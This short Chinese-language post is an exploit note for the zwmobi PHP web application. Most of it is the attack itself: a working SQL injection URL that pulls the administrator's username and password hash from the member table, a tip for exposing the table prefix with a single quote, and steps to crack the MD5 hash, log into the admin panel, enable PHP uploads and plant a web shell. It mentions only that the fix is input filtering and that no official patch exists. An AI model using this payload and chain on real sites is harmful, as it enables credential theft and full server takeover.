漏洞利用:zwmobi.php?zwmobi=bbsview&V=21&cid=12/**/union/**/select/**/1,1,1,1,username,password,1,1,1,1/**/from/**/表前缀_member/**/where/**/uid=1
搜狗电脑知识网
其中uid就是用户的uid,因为默认管理uid是1.表前缀请替换为实际的表前缀,默认是zwmobi,可以通过在 cid=12后面加一个单引号爆出。
修复:过滤
官方补丁:尚未发布
爆出来的MD5密码拿去破解,破解了在 admin_index.php登录,在后台配置的地方加个php类型的上传。然后点系统模块,软件管理,添加软件,传马